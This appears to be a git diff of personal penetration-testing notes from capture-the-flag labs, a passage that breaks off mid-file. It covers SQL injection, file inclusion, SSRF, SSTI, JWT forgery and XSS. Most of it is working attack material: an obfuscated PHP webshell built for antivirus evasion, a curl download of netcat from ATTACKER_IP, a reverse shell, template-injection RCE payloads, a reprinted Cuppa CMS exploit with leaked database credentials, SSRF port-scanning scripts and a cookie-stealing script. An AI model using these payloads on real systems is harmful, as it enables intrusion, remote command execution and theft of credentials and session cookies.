Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43
|
|
@ -0,0 +1,8 @@
|
||||||
|
import pwn
|
||||||
|
|
||||||
|
r = pwn.remote("10.10.156.228", 9999)
|
||||||
|
r.recvuntil(":")
|
||||||
|
r.send("User\r\n")
|
||||||
|
r.recvuntil(":")
|
||||||
|
r.send(b'A' * 2200)
|
||||||
|
r.recvuntil("message:")
|
|
@ -0,0 +1,3 @@
|
||||||
|
# Pwntools
|
||||||
|
|
||||||
|
* [Docs](https://docs.pwntools.com/en/stable/)
|
|
@ -0,0 +1,4 @@
|
||||||
|
# Scapy
|
||||||
|
|
||||||
|
* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html)
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003
|
|
@ -0,0 +1,12 @@
|
||||||
|
# smbmap
|
||||||
|
|
||||||
|
* [Repo](https://github.com/ShawnDEvans/smbmap.git)
|
||||||
|
* `python3 -m pip install -r requirements.txt`
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
* `-x` execute command on server
|
||||||
|
* `-s` enumerate share
|
||||||
|
|
||||||
|
```sh
|
||||||
|
smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
|
||||||
|
```
|
|
@ -0,0 +1,86 @@
|
||||||
|
# SQL Injection
|
||||||
|
|
||||||
|
# Finding an Opportunity
|
||||||
|
* GET parameter
|
||||||
|
```sh
|
||||||
|
http://example.com/index.php?id=' or 1=1 -- -
|
||||||
|
```
|
||||||
|
* Provoke error to gain information
|
||||||
|
```sh
|
||||||
|
http://example.com/index.php?id='
|
||||||
|
```
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
|
||||||
|
```sql
|
||||||
|
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
|
||||||
|
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
|
||||||
|
```
|
||||||
|
|
||||||
|
* Boolean True and False
|
||||||
|
```sql
|
||||||
|
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
|
||||||
|
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
|
||||||
|
```
|
||||||
|
|
||||||
|
* Blind injection // Guessing characters
|
||||||
|
```sh
|
||||||
|
http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
|
||||||
|
```
|
||||||
|
|
||||||
|
### Union based
|
||||||
|
* Check number of cols
|
||||||
|
```sql
|
||||||
|
' UNION SELECT NULL--
|
||||||
|
' UNION SELECT NULL,NULL--
|
||||||
|
' UNION SELECT NULL,NULL,NULL--
|
||||||
|
# until the error occurs
|
||||||
|
```
|
||||||
|
* Check which one is a string
|
||||||
|
```sql
|
||||||
|
' UNION SELECT 'a',NULL,NULL,NULL--
|
||||||
|
' UNION SELECT NULL,'a',NULL,NULL--
|
||||||
|
' UNION SELECT NULL,NULL,'a',NULL--
|
||||||
|
' UNION SELECT NULL,NULL,NULL,'a'--
|
||||||
|
```
|
||||||
|
* Retrieve content, for cols and comment two times as an example. Or dump database
|
||||||
|
```sql
|
||||||
|
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
|
||||||
|
' UNION SELECT NULL,username,password,NULL FROM users -- //
|
||||||
|
```
|
||||||
|
|
||||||
|
* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
### SQLmap
|
||||||
|
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
||||||
|
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||||
|
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
||||||
|
* Use `-r` with a saved HTTP request
|
||||||
|
```sh
|
||||||
|
sqlmap -r request.txt --dbms=mysql --dump
|
||||||
|
sqlmap -r request.txt --batch
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|Parameter|Details|
|
||||||
|
|-r|Uses the intercepted request save as a file|
|
||||||
|
|--dbms|DBMS of target|
|
||||||
|
|--dump|Dump the entire database|
|
||||||
|
|--dump-all|Dump everything|
|
||||||
|
|-p |TESTPARAMETER|
|
||||||
|
|--os-shell|Prompt for an interactive operating system shell|
|
||||||
|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|
||||||
|
|
||||||
|
### Damn Small SQLi Scanner (DSSS)
|
||||||
|
* [Script](https://github.com/stamparm/DSSS.git)
|
||||||
|
```sh
|
||||||
|
python dsss.py -u "http://example.com/index.php?id="
|
||||||
|
```
|
||||||
|
|
||||||
|
### Online sqlmap
|
||||||
|
* [Link](https://suip.biz/?act=sqlmap)
|
||||||
|
|
||||||
|
## Payloads
|
||||||
|
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
|
|
@ -0,0 +1,4 @@
|
||||||
|
# Sudo pwnge with pwfeedback()
|
||||||
|
|
||||||
|
* Sudo version 1.7.1 to 1.8.30
|
||||||
|
* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 15af383355e87428a54251664feca7004a21e291
|
|
@ -0,0 +1 @@
|
||||||
|
# CSRF
|
|
@ -0,0 +1,23 @@
|
||||||
|
# Forced Browsing
|
||||||
|
Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
### wfuzz
|
||||||
|
* `pip install wfuzz`
|
||||||
|
|
||||||
|
```
|
||||||
|
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
|Parameter|Detail|
|
||||||
|
|---------|------|
|
||||||
|
|-c|Shows the output in color|
|
||||||
|
|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with|
|
||||||
|
|--hc|Don't show certain http response codes|
|
||||||
|
|--hl|Don't show a certain amount of lines in the response|
|
||||||
|
|--hh|Don't show a certain amount of words|
|
||||||
|
|--hw|Don't show word response return val of this length|
|
||||||
|
|
|
@ -0,0 +1,3 @@
|
||||||
|
# Insecure Direct Object Reference (IDOR)
|
||||||
|
|
||||||
|
Changing URL parameters.
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61
|
|
@ -0,0 +1,88 @@
|
||||||
|
# JSON Web Token
|
||||||
|
|
||||||
|
## Build up
|
||||||
|
```sh
|
||||||
|
header.payload.signature
|
||||||
|
```
|
||||||
|
|
||||||
|
1. **Header**: This consists of the algorithm used and the type of the token.
|
||||||
|
```sh
|
||||||
|
{ "alg": "HS256", "typ": "JWT"}
|
||||||
|
```
|
||||||
|
|
||||||
|
2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.
|
||||||
|
|
||||||
|
|
||||||
|
3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)
|
||||||
|
|
||||||
|
|
||||||
|
## NONE Algorithm Vulnerability
|
||||||
|
* Example with `alg: NONE`, so no third part is needed.
|
||||||
|
```sh
|
||||||
|
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.
|
||||||
|
```
|
||||||
|
* Encoded headers are as follows
|
||||||
|
* `{"type": "JWT", "alg": "none"}`
|
||||||
|
```
|
||||||
|
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
|
||||||
|
```
|
||||||
|
* `{"typ":"JWT","alg":"NONE"}` with trailing `\n`
|
||||||
|
```
|
||||||
|
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K
|
||||||
|
```
|
||||||
|
|
||||||
|
## Brute Force
|
||||||
|
```python
|
||||||
|
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
|
||||||
|
```
|
||||||
|
* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git)
|
||||||
|
|
||||||
|
|Parameter|Details|
|
||||||
|
|---------|-------|
|
||||||
|
|Token | The HS256 JWT Token|
|
||||||
|
|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")|
|
||||||
|
|max-length|Secret max length (default: 12)|
|
||||||
|
|
||||||
|
```sh
|
||||||
|
[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4
|
||||||
|
Attempts: 100000
|
||||||
|
Attempts: 200000
|
||||||
|
Attempts: 300000
|
||||||
|
SECRET FOUND: pass
|
||||||
|
Time taken (sec): 11.605
|
||||||
|
Attempts: 346830
|
||||||
|
```
|
||||||
|
## HS256 Vulnerability
|
||||||
|
It is calculated by using server `K_pub`, which may be gained via content of the server cert
|
||||||
|
|
||||||
|
### Build Up
|
||||||
|
* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values.
|
||||||
|
```sh
|
||||||
|
$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64
|
||||||
|
eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9
|
||||||
|
```
|
||||||
|
|
||||||
|
* Encoding the payload, no spaces inbetween. Cut `==` at the end.
|
||||||
|
```sh
|
||||||
|
echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64
|
||||||
|
eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ==
|
||||||
|
```
|
||||||
|
|
||||||
|
* Crafting the HMAC signature
|
||||||
|
* Convert `K_pub` file to hex
|
||||||
|
```sh
|
||||||
|
cat id_rsa.pub | xxd -p | tr -d "\\n"
|
||||||
|
```
|
||||||
|
* Sign the message to get the signature as hex value
|
||||||
|
```sh
|
||||||
|
echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey <converted_public_hex>
|
||||||
|
```
|
||||||
|
* Decode hex to binary data and reencode as base64 via python
|
||||||
|
```python
|
||||||
|
python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature_as_hexval>')).replace('=','')\")"
|
||||||
|
```
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
* [JWTtool](https://github.com/ticarpi/jwt_tool.git)
|
||||||
|
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token)
|
||||||
|
* https://jwt.io
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da
|
|
@ -0,0 +1 @@
|
||||||
|
{"typ": "JWT", "alg": "HS256"}
|
|
@ -0,0 +1,19 @@
|
||||||
|
# Local File Inclusion
|
||||||
|
To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
* Exploit URL parameter
|
||||||
|
```
|
||||||
|
http://example.com/home?page=about.html
|
||||||
|
```
|
||||||
|
* changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
|
||||||
|
```
|
||||||
|
http://example.com/home?page=../../../../etc/passwd
|
||||||
|
```
|
||||||
|
or
|
||||||
|
```
|
||||||
|
http://example.com/home?page=../../../../home/<username>/.ssh/id_rsa
|
||||||
|
```
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,17 @@
|
||||||
|
We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on.
|
||||||
|
|
||||||
|
1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
|
||||||
|
2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
|
||||||
|
3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on.
|
||||||
|
* An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files.
|
||||||
|
4. Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.
|
||||||
|
|
||||||
|
|
||||||
|
Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:
|
||||||
|
|
||||||
|
* If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
|
||||||
|
* Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
|
||||||
|
* As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
|
||||||
|
* Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far.
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,35 @@
|
||||||
|
# PHP Payload in Image ExifData
|
||||||
|
|
||||||
|
* Test
|
||||||
|
```sh
|
||||||
|
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
|
||||||
|
```
|
||||||
|
|
||||||
|
* Build Payload with AV evasion
|
||||||
|
```sh
|
||||||
|
<?php
|
||||||
|
$cmd = $_GET["wreath"];
|
||||||
|
if (isset($cmd)){
|
||||||
|
echo "<pre>" . shell_exec($cmd) . "</pre>";
|
||||||
|
}
|
||||||
|
die();
|
||||||
|
?>
|
||||||
|
```
|
||||||
|
|
||||||
|
* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)
|
||||||
|
|
||||||
|
* Obfuscated code with escaped `$`
|
||||||
|
```sh
|
||||||
|
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
|
||||||
|
```
|
||||||
|
* Upload and execute commands with get parameter `?wreath=systeminfo`
|
||||||
|
|
||||||
|
## Uploading Reverse through Webshell
|
||||||
|
* Parameter for Webshell
|
||||||
|
```sh
|
||||||
|
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
|
||||||
|
```
|
||||||
|
* Trigger uploaded netcat
|
||||||
|
```sh
|
||||||
|
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
|
||||||
|
```
|
|
@ -0,0 +1,9 @@
|
||||||
|
# Re-registration
|
||||||
|
|
||||||
|
Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
* Re-register. The name is taken, that's the point, but alter the string
|
||||||
|
```
|
||||||
|
try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.
|
||||||
|
```
|
|
@ -0,0 +1,87 @@
|
||||||
|
# Exploit Title : Cuppa CMS File Inclusion
|
||||||
|
# Date : 4 June 2013
|
||||||
|
# Exploit Author : CWH Underground
|
||||||
|
# Site : www.2600.in.th
|
||||||
|
# Vendor Homepage : http://www.cuppacms.com/
|
||||||
|
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
|
||||||
|
# Version : Beta
|
||||||
|
# Tested on : Window and Linux
|
||||||
|
|
||||||
|
,--^----------,--------,-----,-------^--,
|
||||||
|
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
|
||||||
|
`+---------------------------^----------|
|
||||||
|
`\_,-------, _________________________|
|
||||||
|
/ XXXXXX /`| /
|
||||||
|
/ XXXXXX / `\ /
|
||||||
|
/ XXXXXX /\______(
|
||||||
|
/ XXXXXX /
|
||||||
|
/ XXXXXX /
|
||||||
|
(________(
|
||||||
|
`------'
|
||||||
|
|
||||||
|
####################################
|
||||||
|
VULNERABILITY: PHP CODE INJECTION
|
||||||
|
####################################
|
||||||
|
|
||||||
|
/alerts/alertConfigField.php (LINE: 22)
|
||||||
|
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
LINE 22:
|
||||||
|
<?php include($_REQUEST["urlConfig"]); ?>
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
#####################################################
|
||||||
|
DESCRIPTION
|
||||||
|
#####################################################
|
||||||
|
|
||||||
|
An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.
|
||||||
|
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]
|
||||||
|
|
||||||
|
#####################################################
|
||||||
|
EXPLOIT
|
||||||
|
#####################################################
|
||||||
|
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
|
||||||
|
|
||||||
|
Moreover, We could access Configuration.php source code via PHPStream
|
||||||
|
|
||||||
|
For Example:
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Base64 Encode Output:
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Base64 Decode Output:
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
<?php
|
||||||
|
class Configuration{
|
||||||
|
public $host = "localhost";
|
||||||
|
public $db = "cuppa";
|
||||||
|
public $user = "root";
|
||||||
|
public $password = "Db@dmin";
|
||||||
|
public $table_prefix = "cu_";
|
||||||
|
public $administrator_template = "default";
|
||||||
|
public $list_limit = 25;
|
||||||
|
public $token = "OBqIPqlFWf3X";
|
||||||
|
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
|
||||||
|
public $upload_default_path = "media/uploadsFiles";
|
||||||
|
public $maximum_file_size = "5242880";
|
||||||
|
public $secure_login = 0;
|
||||||
|
public $secure_login_value = "";
|
||||||
|
public $secure_login_redirect = "";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
-----------------------------------------------------------------------------
|
||||||
|
|
||||||
|
Able to read sensitive information via File Inclusion (PHP Stream)
|
||||||
|
|
||||||
|
################################################################################################################
|
||||||
|
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
|
||||||
|
################################################################################################################
|
|
@ -0,0 +1,17 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
|
||||||
|
s = requests.Session()
|
||||||
|
|
||||||
|
t = []
|
||||||
|
j = 0
|
||||||
|
for i in range(1, 65536):
|
||||||
|
r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}")
|
||||||
|
print(r.text)
|
||||||
|
if "Target is not reachable!" in r.text:
|
||||||
|
print(f"{i} is reachable, sum is {j}")
|
||||||
|
t.append(f"Port {i}, {r.text}")
|
||||||
|
else:
|
||||||
|
print (f"{i} not reachable")
|
||||||
|
print(t)
|
|
@ -0,0 +1,8 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
for x in {1..65535};
|
||||||
|
do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \
|
||||||
|
-w '%{size_download}');
|
||||||
|
if [ $cmd != 1045 ]; then
|
||||||
|
echo "Open port: $x"
|
||||||
|
fi
|
||||||
|
done
|
|
@ -0,0 +1,31 @@
|
||||||
|
"""
|
||||||
|
u can run this in the following format:
|
||||||
|
For decimal: python3 ip2dh.py D <Ip-address>
|
||||||
|
For Hexadecimal: python3 ip2dh.py H <Ip-address>
|
||||||
|
"""
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
import sys
|
||||||
|
|
||||||
|
if len(sys.argv) < 3:
|
||||||
|
print('\nYou must give desired format and IPv4 address as input...')
|
||||||
|
print('e.g.: D 192.168.10.100')
|
||||||
|
print('Valid formats D=Decimal H=Hexadecimal\n')
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
Format = sys.argv[1]
|
||||||
|
|
||||||
|
def long(ip):
|
||||||
|
IP = ip.split('.')
|
||||||
|
IP = list(map(int, IP))
|
||||||
|
LongIP = IP[0]*2**24 + IP[1]*2**16 + IP[2]*2**8 + IP[3]
|
||||||
|
return LongIP
|
||||||
|
|
||||||
|
ip = long(sys.argv[2])
|
||||||
|
|
||||||
|
if Format == 'D':
|
||||||
|
print('\nIP as Decimal format: %s' % (ip))
|
||||||
|
|
||||||
|
if Format == 'H':
|
||||||
|
print('\nIP as Hexadecimal format: %s' % (hex(ip)))
|
||||||
|
|
|
@ -0,0 +1,26 @@
|
||||||
|
# Server Side Request Forgery (SSRF)
|
||||||
|
is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
### Sanity Test Service
|
||||||
|
Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
|
||||||
|
```
|
||||||
|
http://127.0.0.1:3306
|
||||||
|
http://localhost:5432
|
||||||
|
http://0.0.0.0:53
|
||||||
|
```
|
||||||
|
* IPv6
|
||||||
|
```
|
||||||
|
http://[::]:3306
|
||||||
|
http://:::3006
|
||||||
|
```
|
||||||
|
* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)
|
||||||
|
|
||||||
|
### Reading files
|
||||||
|
```
|
||||||
|
file:///etc/passwd
|
||||||
|
```
|
||||||
|
|
||||||
|
### Tools
|
||||||
|
* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)
|
|
@ -0,0 +1,59 @@
|
||||||
|
# Server Side Template Injection (SSTI)
|
||||||
|
Pass in parameters to control the template.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
* Sanity test
|
||||||
|
```python
|
||||||
|
{{2+2}}
|
||||||
|
```
|
||||||
|
|
||||||
|
* Flask template LFI
|
||||||
|
```python
|
||||||
|
{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
|
||||||
|
```
|
||||||
|
|
||||||
|
* Executing commands
|
||||||
|
```sh
|
||||||
|
{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
* RCE on server
|
||||||
|
```python
|
||||||
|
{{config.__class__.__init__.__globals__['os'].popen(<command>).read()}}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Identification of Template Engine
|
||||||
|
Identify via payload checking
|
||||||
|
* Smarty: `a{*comment*}b`
|
||||||
|
* Mako: `${"z".join("ab")}`
|
||||||
|
* Twig or Jinja2
|
||||||
|
```sh
|
||||||
|
{{7*7}}
|
||||||
|
{{7*'7'}}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
### TPlmap
|
||||||
|
```sh
|
||||||
|
git clone https://github.com/epinna/tplmap.git
|
||||||
|
pip2 install -r requirements
|
||||||
|
```
|
||||||
|
|
||||||
|
|HTTP Method|Parameter|
|
||||||
|
|-----------|---------|
|
||||||
|
|GET|`tplmap -u <url>/?<vulnparam>`|
|
||||||
|
|POST|`tplmap -u <url> -d '<vulnparam>'`|
|
||||||
|
|
||||||
|
* Using remote command
|
||||||
|
```
|
||||||
|
tplmap -u http://<ip>:<port>/ -d '<vulnparam>' --os-cmd "cat /etc/passwd"
|
||||||
|
```
|
||||||
|
|
||||||
|
### Countermeasure
|
||||||
|
* Remove everything in user input but alnum. Passing data, not data to f-string.
|
||||||
|
```python
|
||||||
|
input = re.sub("[^A-Za-z0-9]", "", input)
|
||||||
|
template = "User input is {{ input }}"
|
||||||
|
return render_template_string(template, input=input)
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98
|
|
@ -0,0 +1,3 @@
|
||||||
|
# URL Forgery
|
||||||
|
|
||||||
|
* Just change parts of the URL
|
|
@ -0,0 +1,106 @@
|
||||||
|
# Cross-Site Scripting
|
||||||
|
A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.
|
||||||
|
|
||||||
|
## Stored XSS
|
||||||
|
This is where a malicious string originates from the websites database.
|
||||||
|
|
||||||
|
### Examples
|
||||||
|
* Sanity test by changing DOM content
|
||||||
|
```
|
||||||
|
<script>document.getElementById('myIdName').innerHTML="napf"</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Cookie stealing
|
||||||
|
|
||||||
|
```
|
||||||
|
<script>document.location='/log/'+document.cookie</script>
